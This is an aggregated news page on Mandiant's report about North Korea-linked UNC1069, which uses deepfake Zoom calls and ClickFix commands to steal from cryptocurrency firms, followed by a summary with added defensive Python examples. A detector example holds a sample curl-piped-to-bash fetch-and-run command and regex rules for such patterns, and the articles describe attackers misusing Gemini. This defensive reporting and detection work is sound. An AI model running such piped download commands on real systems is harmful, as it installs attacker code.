5 Sources
[1]
North Korea-Linked UNC1069 Uses AI Lures to Attack Cryptocurrency Organizations
The North Korea-linked threat actor known as UNC1069 has been observed targeting the cryptocurrency sector to steal sensitive data from Windows and macOS systems with the ultimate goal of facilitating financial theft. "The intrusion relied on a social engineering scheme involving a compromised Telegram account, a fake Zoom meeting, a ClickFix infection vector, and reported usage of AI-generated video to deceive the victim," Google Mandiant researchers Ross Inman and Adrian Hernandez said.

UNC1069, assessed to be active since at least April 2018, has a history of conducting social engineering campaigns for financial gain using fake meeting invites and posing as investors from reputable companies on Telegram. It's also tracked by the broader cybersecurity community under the monikers CryptoCore and MASAN.

In a report published last November, Google Threat Intelligence Group (GTIG) pointed out the threat actor's use of generative artificial intelligence (AI) tools like Gemini to produce lure material and other messaging related to cryptocurrency as part of efforts to support its social engineering campaigns. The group has also been observed attempting to misuse Gemini to develop code to steal cryptocurrency, as well as leverage deepfake images and video lures mimicking individuals in the cryptocurrency industry in its campaigns to distribute a backdoor called BIGMACHO to victims by passing it off as a Zoom software development kit (SDK).

"Since at least 2023, the group has shifted from spear-phishing techniques and traditional finance (TradFi) targeting towards the Web3 industry, such as centralized exchanges (CEX), software developers at financial institutions, high-technology companies, and individuals at venture capital funds," Google said.

In the latest intrusion documented by the tech giant's threat intelligence division, UNC1069 is said to have deployed as many as seven unique malware families, including several new malware families, such as SILENCELIFT, DEEPBREATH, and CHROMEPUSH.

It all starts when a victim is approached by the threat actor via Telegram by impersonating venture capitalists and, in a few cases, even using compromised accounts of legitimate entrepreneurs and startup founders. Once contact is established, the threat actor uses Calendly to schedule a 30-minute meeting with them. The meeting link is designed to redirect the victim to a fake website masquerading as Zoom ("zoom.uswe05[.]us"). In certain cases, the meeting links are directly shared via messages on Telegram, often using Telegram's hyperlink feature to hide the phishing URLs.

Regardless of the method used, as soon as the victim clicks the link, they are presented with a fake video call interface that mirrors Zoom, urging them to enable their camera and enter their name. Once the target joins the meeting, they are shown a screen that resembles an actual Zoom meeting. However, it's suspected that the videos are either deepfakes or real recordings stealthily captured from other victims who had previously fallen prey to the same scheme.

It's worth noting that Kaspersky is tracking the same campaign under the name GhostCall, which was documented in detail in October 2025. "Their webcam footage had been unknowingly recorded, then uploaded to attacker-controlled infrastructure, and reused to deceive other victims, making them believe they were participating in a genuine live call," the Russian security vendor noted at the time. "When the video replay ended, the page smoothly transitioned to showing that user's profile image, maintaining the illusion of a live call."

The attack proceeds to the next phase when the victim is shown a bogus error message about a purported audio issue, after which they are prompted to download and run a ClickFix-style troubleshooting command to address the problem. In the case of macOS, the commands lead to the delivery of an AppleScript that, in turn, drops a malicious Mach-O binary on the system. Called WAVESHAPER, the malicious C++ executable is designed to gather system information and distribute a Go-based downloader codenamed HYPERCALL, which is then used to serve additional payloads.

DEEPBREATH is equipped to manipulate macOS's Transparency, Consent, and Control (TCC) database to gain file system access, enabling it to steal iCloud Keychain credentials and data from Google Chrome, Brave, Microsoft Edge, Telegram, and the Apple Notes application. Like DEEPBREATH, CHROMEPUSH also acts as a data stealer, only it's written in C++ and is deployed as a browser extension to Google Chrome and Brave browsers by masquerading as a tool for editing Google Docs offline. It also comes with the ability to record keystrokes, observe username and password inputs, and extract browser cookies.

"The volume of tooling deployed on a single host indicates a highly determined effort to harvest credentials, browser data, and session tokens to facilitate financial theft," Mandiant said. "While UNC1069 typically targets cryptocurrency startups, software developers, and venture capital firms, the deployment of multiple new malware families alongside the known downloader SUGARLOADER marks a significant expansion in their capabilities."
[2]
Google Warns of AI-Powered North Korean Malware Campaign Targeting Crypto, DeFi - Decrypt
Experts warn that trusted digital identities are becoming the weakest link.

Google's security team at Mandiant has warned that North Korean hackers are incorporating artificial intelligence-generated deepfakes into fake video meetings as part of increasingly sophisticated attacks against crypto companies, according to a report released Monday. Mandiant said it recently investigated an intrusion at a fintech company that it attributes to UNC1069, or "CryptoCore", a threat actor linked with high confidence to North Korea. The attack used a compromised Telegram account, a spoofed Zoom meeting, and a so-called ClickFix technique to trick the victim into running malicious commands. Investigators also found evidence that AI-generated video was used to deceive the target during the fake meeting.

"Mandiant has observed UNC1069 employing these techniques to target both corporate entities and individuals within the cryptocurrency industry, including software firms and their developers, as well as venture capital firms and their employees or executives," the report said.

The warning comes as North Korea's cryptocurrency thefts continue to grow in scale. In mid-December, blockchain analytics firm Chainalysis said North Korean hackers stole $2.02 billion in cryptocurrency in 2025, a 51% increase from the year before. The total amount stolen by DPRK-linked actors now stands at roughly $6.75 billion, even as the number of attacks has declined.

The findings highlight a broader shift in how state-linked cybercriminals are operating. Rather than relying on mass phishing campaigns, CryptoCore and similar groups are focusing on highly tailored attacks that exploit trust in routine digital interactions, such as calendar invites and video calls. In this way, North Korea is achieving larger thefts through fewer, more targeted incidents.

According to Mandiant, the attack began when the victim was contacted on Telegram by what appeared to be a known cryptocurrency executive whose account had already been compromised. After building rapport, the attacker sent a Calendly link for a 30-minute meeting that directed the victim to a fake Zoom call hosted on the group's own infrastructure. During the call, the victim reported seeing what appeared to be a deepfake video of a well-known crypto CEO. Once the meeting began, the attackers claimed there were audio problems and instructed the victim to run "troubleshooting" commands, a ClickFix technique that ultimately triggered the malware infection. Forensic analysis later identified seven distinct malware families on the victim's system, deployed in an apparent attempt to harvest credentials, browser data and session tokens for financial theft and future impersonation.

Fraser Edwards, co-founder and CEO of decentralized identity firm cheqd, said the attack reflects a pattern he is seeing repeatedly against people whose jobs depend on remote meetings and rapid coordination. "The effectiveness of this approach comes from how little has to look unusual," Edwards said. "The sender is familiar. The meeting format is routine. There is no malware attachment or obvious exploit. Trust is leveraged before any technical defence has a chance to intervene."

Edwards said deepfake video is typically introduced at escalation points, such as live calls, where seeing a familiar face can override doubts created by unexpected requests or technical issues. "Seeing what appears to be a real person on camera is often enough to override doubt created by an unexpected request or technical issue. The goal is not prolonged interaction, but just enough realism to move the victim to the next step," he said. He added that AI is now being used to support impersonation outside of live calls.

"It is used to draft messages, correct tone of voice, and mirror the way someone normally communicates with colleagues or friends. That makes routine messages harder to question and reduces the chance that a recipient pauses long enough to verify the interaction," he explained.

Edwards warned the risk will increase as AI agents are introduced into everyday communication and decision-making. "Agents can send messages, schedule calls, and act on behalf of users at machine speed. If those systems are abused or compromised, deepfake audio or video can be deployed automatically, turning impersonation from a manual effort into a scalable process," he said.

It's "unrealistic" to expect most users to know how to spot a deepfake, Edwards said, adding that, "The answer is not asking users to pay closer attention, but building systems that protect them by default. That means improving how authenticity is signalled and verified, so users can quickly understand whether content is real, synthetic, or unverified without relying on instinct, familiarity, or manual investigation."
[3]
AI-assisted hacking group hits targets with a complicated 'social engineering' scam that involves deepfaked CEOs, spoofed Zoom calls and a malicious troubleshooting program
This is one of many scams made in tandem with AI tools right now.

A hacking group reportedly based out of North Korea has come up with a "new tooling and AI-enabled social engineering" scam, according to Google, and it's pretty complicated. Effectively, it uses a hacked account to send a Zoom link via a calendar invite to an uncompromised account. That version of Zoom is, in fact, a spoof, and what targets are met with is a deepfaked version of the account owner. Google's report notes that a version of this deepfake takes the form "of a CEO from another cryptocurrency company."

Once in the meeting, the deepfaked user claims to have technical issues and directs the target on how to troubleshoot their PC. The troubleshooting prompt leads them to run an infected string of commands that then unleashes a series of backdoors and data miners on the victim's PC. Google calls it "AI-enabled social engineering" and notes 7 new malware families used in the attack.

UNC1069 are the actors Google has identified as being behind the scam. They have reportedly been active since 2018 and were found to have been using Gemini last year to "develop code to steal cryptocurrency, as well as to craft fraudulent instructions impersonating a software update to extract user credentials". Google says UNC1069 is "employing these techniques to target both corporate entities and individuals within the cryptocurrency industry, including software firms and their developers, as well as venture capital firms and their employees or executives."

This hack needs access to an account to start in the first place, so Google notes further attacks have "a dual purpose; enabling cryptocurrency theft and fueling future social engineering campaigns by leveraging victim's identity and data." Though Google states that the account linked to the group has been terminated, Gemini was used at some point "to develop tooling, conduct operational research, and assist during the reconnaissance stages."
Gemini is not the only AI tool being used in similar cybercrimes. Antivirus creator and cybersecurity company Kaspersky claims hacking group BlueNoroff is using GPT-4o to enhance images to convince targets. As AI gets more impressive and complicated, so too will the scams to accompany it. One can only hope that anti-scam measures become equally clever.
[4]
North Korea Linked Hackers Deploy New Crypto Malware
Mandiant, which operates under Google Cloud, has tracked the suspected North Korean scammers since 2018, but AI has helped scale up malicious attacks since November 2025.

North Korea-linked threat actors are escalating social engineering campaigns targeting cryptocurrency and fintech companies, deploying new malware designed to harvest sensitive data and steal digital assets. In a recent campaign, a threat cluster tracked as UNC1069 deployed seven malware families aimed at capturing and exfiltrating victim data, according to a Tuesday report by Mandiant, a US cybersecurity firm that operates under Google Cloud. The campaign relied on social engineering schemes involving compromised Telegram accounts and fake Zoom meetings with deepfake videos generated through artificial intelligence tools.

"This investigation revealed a tailored intrusion resulting in the deployment of seven unique malware families, including a new set of tooling designed to capture host and victim data: SILENCELIFT, DEEPBREATH and CHROMEPUSH," the report states.

Mandiant said the activity represents an expansion of the group's operations, primarily targeting crypto firms, software developers and venture capital companies. The malware included two newly discovered, sophisticated data-mining viruses, named CHROMEPUSH and DEEPBREATH, which are designed to bypass key operating system components and gain access to personal data.

The threat actor with "suspected" North Korean ties has been tracked by Mandiant since 2018, but AI advancements helped the malicious actor scale up its efforts and include "AI-enabled lures in active operations" for the first time in November 2025, according to a report at the time from the Google Threat Intelligence Group. Cointelegraph contacted Mandiant for additional details regarding the attribution, but had not received a response by publication.

In one intrusion outlined by Mandiant, attackers used a compromised Telegram account belonging to a crypto founder to initiate contact. The victim was invited to a Zoom meeting featuring a fabricated video feed in which the attacker claimed to be experiencing audio problems. The attacker then directed the user to run troubleshooting commands on their system to fix the purported audio issue, a scam known as a ClickFix attack. The troubleshooting commands embedded a hidden command that initiated the infection chain, according to Mandiant.

North Korea-linked illicit actors have been a persistent threat to both crypto investors and Web3-native companies. In June 2025, four North Korean operatives infiltrated multiple crypto firms as freelance developers, stealing a cumulative $900,000 from these startups, Cointelegraph reported. Earlier that year, the Lazarus Group was linked to the $1.4 billion hack of Bybit, one of the largest crypto thefts on record.
[5]
Google Cloud Sounds the Alarm: North Korea's New AI Crypto Malware Is Draining Wallets
Google Cloud warns that North Korea-linked hackers are using AI-powered deepfake Zoom calls and new malware strains to target crypto firms. (Credit: CCN.com)

* Google Cloud's Mandiant has identified a new North Korea-linked malware campaign targeting crypto companies, developers, and venture capital firms.
* The threat group, tracked as UNC1069, is deploying seven malware families, including newly discovered strains like CHROMEPUSH and DEEPBREATH.
* The attackers are using AI-powered social engineering, including deepfake Zoom calls and compromised Telegram accounts, to trick victims into installing malware.
* Crypto companies remain prime targets due to direct access to funds, remote communication workflows, and irreversible blockchain transactions.

A new warning from Google Cloud is putting the crypto industry on high alert. Mandiant, the cybersecurity firm operating under Google Cloud, says a North Korea-linked threat group is deploying advanced malware designed to steal cryptocurrency and sensitive data, and artificial intelligence is helping them scale faster than ever.

According to Mandiant, the threat cluster, tracked as UNC1069, has launched a new wave of targeted attacks against crypto companies, software developers, and venture capital firms. The campaign includes seven distinct malware families, some newly discovered, that are capable of bypassing system protections and extracting wallet-related information. The development marks a significant escalation in cyber threats facing the digital asset ecosystem.

How the New AI-Driven Crypto Malware Works

The attackers are not relying on brute-force hacks. Instead, they are using social engineering, a tactic that manipulates people into giving access voluntarily. In one case documented by Mandiant, attackers compromised a Telegram account belonging to a crypto founder. They then contacted a target and invited them to what appeared to be a legitimate Zoom meeting. The twist: the meeting featured a deepfake video created using artificial intelligence. During the call, the attacker claimed there were audio issues and asked the victim to run troubleshooting commands. Hidden within those commands was malicious code that triggered the infection process, a method known as a ClickFix attack. Once installed, the malware begins collecting sensitive information from the victim's device.

The Malware Families Targeting Crypto Users

Mandiant identified seven malware families used in the campaign. Among the most concerning are two newly discovered strains:

* CHROMEPUSH
* DEEPBREATH

These programs are designed to bypass key operating system components and gain access to browser data, stored credentials, and potentially cryptocurrency wallet information. Another tool, named SILENCELIFT, was also deployed in the intrusion chain. According to the report, these malware families are tailored to capture host data, harvest login credentials, and exfiltrate information without immediately alerting victims. The targeting appears highly selective, focusing primarily on crypto-native businesses and individuals with access to digital assets.

Why AI Is Making These Attacks More Dangerous

Mandiant has tracked the suspected North Korea-linked actors since 2018. However, the use of AI marks a new phase. The Google Threat Intelligence Group previously noted that in November 2025, the group began incorporating AI-enabled lures into active operations for the first time. Deepfake videos and automated impersonation tactics make phishing attempts more convincing and harder to detect. Artificial intelligence allows attackers to:

* Create realistic fake video calls
* Mimic voices and facial expressions
* Generate believable messages at scale
* Personalize attacks using scraped data

This lowers the cost of running large-scale campaigns and increases success rates.

Why Crypto Companies Are Prime Targets

Cryptocurrency businesses are attractive targets for several reasons:

* Direct access to funds: Wallet credentials can immediately translate into financial gain.
* High-value individuals: Founders, developers, and executives often manage large sums.
* Remote operations: Crypto teams frequently operate via Telegram, Discord, and Zoom, making impersonation easier.
* Irreversible transactions: Stolen crypto is often difficult to recover.

North Korea-linked actors have repeatedly targeted the sector. Earlier in 2025, four North Korean operatives infiltrated crypto startups as freelance developers, stealing nearly $900,000. The Lazarus Group, another North Korea-linked entity, was connected to the $1.4 billion Bybit hack. These attacks are part of a broader pattern of state-linked cyber activity aimed at generating revenue.

What Google Cloud and Mandiant Are Warning

Mandiant's report highlights that this campaign represents an expansion of previous operations. The combination of social engineering and multiple malware families suggests a coordinated, well-resourced effort. Although Mandiant describes the actors as "suspected" of having North Korean ties, the activity aligns with tactics observed in earlier campaigns. The company has not publicly released further attribution details at this time.

How Crypto Users Can Protect Themselves

For individual investors and companies alike, the threat underscores the importance of cybersecurity hygiene. Key precautions include:

Businesses should also implement internal policies to verify identities during remote meetings and restrict system-level command execution to trusted administrators.

Major North Korea-Linked Hacking Attacks in Crypto

A Growing Cybersecurity Challenge in Crypto

The broader message from Google Cloud is clear: crypto-focused cybercrime is evolving. The integration of AI into malware campaigns significantly raises the bar for defense.
Social engineering attacks that once relied on poorly written phishing emails now involve deepfake video calls and customized scripts. As digital assets become more mainstream, they remain a lucrative target for sophisticated threat actors. While the crypto industry continues to build new infrastructure, it must also strengthen its security practices. AI-powered malware is not a theoretical risk; it is already active. The Google Cloud alarm suggests that vigilance is no longer optional.
Google Mandiant reveals that UNC1069, a North Korea-linked threat actor, is deploying AI-powered attacks including deepfake Zoom calls and seven malware families to target cryptocurrency organizations. The sophisticated campaign uses compromised Telegram accounts and AI-generated lures to steal sensitive data, contributing to $2.02 billion in cryptocurrency thefts in 2025.
The North Korea-linked hackers known as UNC1069 have escalated their operations against cryptocurrency organizations, deploying AI-powered attacks that combine deepfake technology with sophisticated malware to steal sensitive data and digital assets. According to a Google Mandiant report released this week, the threat actor—also tracked as CryptoCore and MASAN—has been active since at least April 2018 but recently incorporated AI-enabled social engineering tactics that make their campaigns significantly more dangerous [1]. The intrusion investigated by Mandiant relied on a compromised Telegram account, deepfake Zoom calls, and a ClickFix infection vector to deceive victims into installing malicious software on their systems [2].
Source: Cointelegraph
The scale of North Korea's cryptocurrency thefts continues to grow. Blockchain analytics firm Chainalysis reported that North Korea-linked hackers stole $2.02 billion in cryptocurrency in 2025, representing a 51% increase from the previous year [2]. The total amount stolen by DPRK-linked actors now stands at roughly $6.75 billion, even as the number of attacks has declined—indicating that targeting cryptocurrency companies with precision yields larger returns than mass campaigns.

The attack methodology employed by UNC1069 demonstrates how AI-generated lures can bypass traditional security measures. Victims are first approached via Telegram by attackers impersonating venture capitalists or using compromised accounts of legitimate entrepreneurs and startup founders [1]. Once contact is established, the threat actor uses Calendly to schedule a 30-minute meeting, then redirects the victim to a fake website masquerading as Zoom. The meeting link, often shared using Telegram's hyperlink feature to hide phishing URLs, presents victims with a fake video call interface that mirrors Zoom's legitimate appearance [3].

What victims see during these deepfake Zoom calls is particularly concerning. In one documented case, the victim reported seeing what appeared to be a deepfake video of a well-known crypto CEO [2]. Kaspersky, which tracks the same campaign under the name GhostCall, discovered that some videos are either deepfakes or real recordings stealthily captured from other victims who had previously fallen prey to the scheme. "Their webcam footage had been unknowingly recorded, then uploaded to attacker-controlled infrastructure, and reused to deceive other victims, making them believe they were participating in a genuine live call," Kaspersky noted [1].
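The fake Zoom site described here and in the Hacker News write-up under source [1] (which gives its host as "zoom.uswe05[.]us") works because the brand name sits in a subdomain of a domain Zoom does not own. The link triage below is an added example written for this page, not code from Mandiant, Google or any of the outlets quoted. It refangs indicator-style hosts, takes the registrable domain of each link and reports "lookalike" when the word "zoom" appears in the hostname but the registrable domain is not on the allowlist. The allowlist of genuine Zoom domains and every sample link except that one host are assumptions constructed for the example.

```python
from urllib.parse import urlsplit

# Registrable domains treated as genuine Zoom. This allowlist is an assumption
# for the example; maintain your organisation's own list of approved meeting hosts.
ZOOM_DOMAINS = {"zoom.us", "zoom.com"}

# Constructed sample: the first entry reproduces the defanged host reported in the
# articles above; the others are made-up links for contrast.
SAMPLE_LINKS = [
    "zoom.uswe05[.]us",
    "https://us02web.zoom.us/j/123456789",
    "https://zoom.us.meet-example.test/join",
    "https://calendly.com/someone/30min",
]


def refang(text: str) -> str:
    """Undo the defanging used in threat reports ("[.]", "hxxp") so indicators parse."""
    return (text.replace("[.]", ".")
                .replace("hxxps://", "https://")
                .replace("hxxp://", "http://"))


def registrable_domain(host: str) -> str:
    """Last two labels of the host. Enough for .us/.com; a public-suffix list
    would be needed for hosts under two-level TLDs such as .co.uk."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host.lower()


def classify_meeting_link(link: str) -> str:
    """Classify a meeting link as 'zoom', 'lookalike' or 'other'.

    'lookalike' means the brand name appears somewhere in the hostname (for
    example as a subdomain, the pattern the articles describe) while the
    registrable domain is not Zoom's. A digit-for-letter swap such as "zo0m"
    is normalised before the check.
    """
    url = refang(link.strip())
    if "://" not in url:
        url = "https://" + url
    host = (urlsplit(url).hostname or "").lower()
    if registrable_domain(host) in ZOOM_DOMAINS:
        return "zoom"
    normalised = host.replace("0", "o").replace("1", "l")
    return "lookalike" if "zoom" in normalised else "other"


def triage(links):
    """Map each link to its verdict; 'lookalike' entries are the ones to block or review."""
    return {link: classify_meeting_link(link) for link in links}


if __name__ == "__main__":
    for link, verdict in triage(SAMPLE_LINKS).items():
        print(f"{verdict:10} {link}")
```

A check like this belongs wherever calendar invites and chat links are already inspected (a mail or messaging gateway, or an EDR URL-click event), and it only catches the brand-in-subdomain pattern the articles describe; full homoglyph handling and a public-suffix list are deliberately out of scope here.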
Source: Hacker News
The Google Mandiant report identifies seven unique malware families deployed in recent UNC1069 campaigns, including several new strains: SILENCELIFT, DEEPBREATH, and CHROMEPUSH [4]. During the fake meeting, victims are shown a bogus error message about audio issues and prompted to run troubleshooting commands—a ClickFix attack that triggers the infection chain [5]. On macOS systems, the commands deliver an AppleScript that drops a malicious Mach-O binary called WAVESHAPER, designed to gather system information and distribute a Go-based downloader codenamed HYPERCALL [1].
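The ClickFix step described here and in the source articles above leaves a recognisable shape in process telemetry: a shell spawned from an interactive terminal that downloads a script and pipes it into another shell, or that launches osascript with an inline script. The detector below is an added example for this page, not Mandiant's or Google's code. The event format (pid, ppid, image, cmdline) and the sample events are constructed assumptions standing in for whatever an EDR or EndpointSecurity feed provides, and the regex rules are generic heuristics, not signatures for WAVESHAPER or HYPERCALL.

```python
import os
import re

# Constructed sample of process-execution events (not real telemetry). Hostnames
# use the reserved .invalid TLD so nothing here resolves.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal",
     "cmdline": "Terminal"},
    {"pid": 101, "ppid": 100, "image": "/bin/zsh", "cmdline": "-zsh"},
    {"pid": 102, "ppid": 101, "image": "/bin/bash",
     "cmdline": "bash -c 'curl -fsSL https://audio-fix.example.invalid/fix.sh | bash'"},
    {"pid": 103, "ppid": 102, "image": "/usr/bin/osascript",
     "cmdline": "osascript -e 'display dialog \"Audio fix applied\"'"},
    {"pid": 200, "ppid": 1,   "image": "/Applications/Xcode.app/Contents/MacOS/Xcode", "cmdline": "Xcode"},
    {"pid": 201, "ppid": 200, "image": "/usr/bin/osascript",
     "cmdline": "osascript /Users/dev/scripts/build-notify.scpt"},
    {"pid": 202, "ppid": 101, "image": "/usr/bin/curl",
     "cmdline": "curl -sI https://status.example.invalid/"},
]

# Interactive terminals: a hit whose ancestry includes one of these has the
# "user pasted a fix into a terminal" shape that ClickFix relies on.
TERMINAL_APPS = {"Terminal", "iTerm2", "Alacritty", "kitty"}

# Command-line shapes worth a closer look, as (name, regex) pairs.
RULES = [
    ("download-piped-to-shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b")),
    ("inline-applescript",      re.compile(r"\bosascript\b.*\s-e\s")),
    ("base64-decode-in-chain",  re.compile(r"\bbase64\b.*\s-[dD]\b")),
]


def ancestry(event, by_pid, max_depth=32):
    """Walk ppid links upward and return the ancestor events, nearest first."""
    chain, cur, depth = [], event, 0
    while cur["ppid"] in by_pid and depth < max_depth:
        cur = by_pid[cur["ppid"]]
        chain.append(cur)
        depth += 1
    return chain


def detect_clickfix(events):
    """Return one finding per event that matches a rule, rated 'high' when the
    process descends from an interactive terminal and 'medium' otherwise."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        hits = [name for name, rx in RULES if rx.search(e["cmdline"])]
        if not hits:
            continue
        lineage = [os.path.basename(a["image"]) for a in ancestry(e, by_pid)]
        from_terminal = any(name in TERMINAL_APPS for name in lineage)
        findings.append({
            "pid": e["pid"],
            "rules": hits,
            "lineage": lineage,
            "severity": "high" if from_terminal else "medium",
        })
    return findings


if __name__ == "__main__":
    for f in detect_clickfix(SAMPLE_EVENTS):
        print(f["severity"], f["pid"], f["rules"], " <- ".join(f["lineage"]))
```

In the sample, the Xcode-spawned osascript with a script file on disk is left alone while the terminal-descended download-and-pipe and inline osascript both rate high; tuning is mostly about which parent applications count as interactive and which internal hosts are allowed to be curl-piped by build tooling.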
DEEPBREATH manipulates macOS's Transparency, Consent, and Control (TCC) database to gain file system access, enabling it to steal iCloud Keychain credentials and data from Google Chrome, Brave, Microsoft Edge, Telegram, and the Apple Notes application [1]. CHROMEPUSH, written in C++, deploys as a browser extension to Google Chrome and Brave browsers by masquerading as a tool for editing Google Docs offline, with capabilities to record keystrokes, observe username and password inputs, and extract browser data including session tokens [5].
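DEEPBREATH's TCC manipulation, described here and in the Hacker News write-up under source [1], amounts to a grant in the TCC database that no user consented to. The audit below is an added example written for this page, not code from Mandiant or Google. It reads the columns that real TCC.db files carry in their `access` table (service, client, client_type, auth_value, auth_reason, last_modified) from a constructed in-memory copy and reports grants of sensitive services that are missing from a known-good baseline. The baseline, the sample rows and the directory markers are assumptions.

```python
import sqlite3

# Services whose grants matter most for data theft. These kTCCService
# identifiers are the real macOS names.
SENSITIVE_SERVICES = {
    "kTCCServiceSystemPolicyAllFiles",   # Full Disk Access
    "kTCCServiceAccessibility",
    "kTCCServiceScreenCapture",
    "kTCCServiceListenEvent",            # Input Monitoring
}

# Approved (service, client) pairs. Assumption for the example: in practice this
# is a snapshot taken from a known-good build of the machine.
BASELINE = {
    ("kTCCServiceSystemPolicyAllFiles", "com.apple.Terminal"),
}


def make_sample_tcc_db():
    """In-memory table with the subset of TCC.db's `access` columns the audit
    reads. Rows are constructed for this example, not taken from a real Mac."""
    conn = sqlite3.connect(":memory:")
    conn.execute("""CREATE TABLE access (
        service TEXT NOT NULL, client TEXT NOT NULL, client_type INTEGER NOT NULL,
        auth_value INTEGER NOT NULL, auth_reason INTEGER NOT NULL,
        last_modified INTEGER NOT NULL)""")
    conn.executemany("INSERT INTO access VALUES (?, ?, ?, ?, ?, ?)", [
        # client_type: 0 = bundle identifier, 1 = absolute path
        # auth_value: 0 = denied, 2 = allowed; auth_reason: 2 = user consent, 3 = user set
        ("kTCCServiceSystemPolicyAllFiles", "com.apple.Terminal", 0, 2, 2, 1700000000),
        ("kTCCServiceMicrophone", "us.zoom.xos", 0, 2, 2, 1700000100),
        ("kTCCServiceCamera", "us.zoom.xos", 0, 2, 2, 1700000100),
        ("kTCCServiceSystemPolicyAllFiles",
         "/Users/dev/Library/Caches/.audiofix/helper", 1, 2, 3, 1700009999),
        ("kTCCServiceAccessibility", "com.example.legit-automation", 0, 0, 2, 1700000200),
    ])
    return conn


def audit_tcc(conn, baseline=BASELINE, since=None):
    """Return sensitive grants not covered by the baseline. `since` (epoch
    seconds) limits the scan to rows modified at or after that time."""
    query = ("SELECT service, client, client_type, auth_value, auth_reason, last_modified "
             "FROM access WHERE auth_value IN (2, 3)")   # allowed or limited
    findings = []
    for service, client, client_type, auth_value, auth_reason, last_modified in conn.execute(query):
        if service not in SENSITIVE_SERVICES or (service, client) in baseline:
            continue
        if since is not None and last_modified < since:
            continue
        notes = ["grant not in baseline"]
        if client_type == 1:
            notes.append("path-based client (no bundle identity)")
        if any(marker in client for marker in ("/.", "/Caches/", "/tmp/")):
            notes.append("client lives in a hidden, cache or temporary directory")
        findings.append({"service": service, "client": client, "auth_reason": auth_reason,
                         "last_modified": last_modified, "notes": notes})
    return findings


if __name__ == "__main__":
    for f in audit_tcc(make_sample_tcc_db()):
        print(f["service"], f["client"], "; ".join(f["notes"]))
```

To run it against a real machine, point `sqlite3.connect` at a copy of the per-user database (~/Library/Application Support/com.apple.TCC/TCC.db) or the system one under /Library/Application Support/com.apple.TCC/; the process taking that copy must itself hold Full Disk Access, which is why this normally runs from an MDM-deployed agent. Because the malware edits the database directly, pair the audit with file-integrity monitoring on those paths rather than trusting the table contents alone, and use `tccutil reset` to revoke a grant you decide to remove.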
Since at least 2023, UNC1069 has shifted from spear-phishing techniques and traditional finance targeting towards the Web3 industry, including centralized exchanges, software developers at financial institutions, high-technology companies, and individuals at venture capital firms [1]. Mandiant observed the group "employing these techniques to target both corporate entities and individuals within the cryptocurrency industry, including software firms and their developers, as well as venture capital firms and their employees or executives" [3].

The volume of tooling deployed on a single host indicates a highly determined effort to harvest credentials, browser data, and session tokens to facilitate financial theft. Fraser Edwards, co-founder and CEO of decentralized identity firm cheqd, emphasized that the attack reflects a pattern targeting people whose jobs depend on remote meetings and rapid coordination. "The effectiveness of this approach comes from how little has to look unusual. The sender is familiar. The meeting format is routine. There is no malware attachment or obvious exploit. Trust is leveraged before any technical defence has a chance to intervene," Edwards explained [2].

Google Threat Intelligence Group previously reported in November 2025 that UNC1069 began using generative AI tools like Gemini to produce lure material and messaging related to cryptocurrency as part of efforts to support its social engineering campaigns [1]. The group attempted to misuse Gemini to develop code to steal cryptocurrency and leverage deepfakes mimicking individuals in the cryptocurrency industry to distribute a backdoor called BIGMACHO by passing it off as a Zoom software development kit [3].

Edwards warned that the risk will increase as AI agents are introduced into everyday communication and decision-making. "Agents can send messages, schedule calls, and act on behalf of users at machine speed. If those systems are abused or compromised, deepfake audio or video can be deployed automatically, turning impersonation from a manual effort into a scalable process," he said [2]. The attacks serve a dual purpose: enabling cryptocurrency theft while fueling future social engineering campaigns by leveraging victims' identities and data [3].
Source: Decrypt
Cryptocurrency businesses remain attractive targets due to direct access to funds, remote communication workflows that make impersonation easier, and irreversible blockchain transactions that make stolen crypto difficult to recover [5]. Earlier in 2025, four North Korean operatives infiltrated crypto startups as freelance developers, stealing nearly $900,000, while the Lazarus Group was linked to the $1.4 billion Bybit hack [4].

Summarized by Navi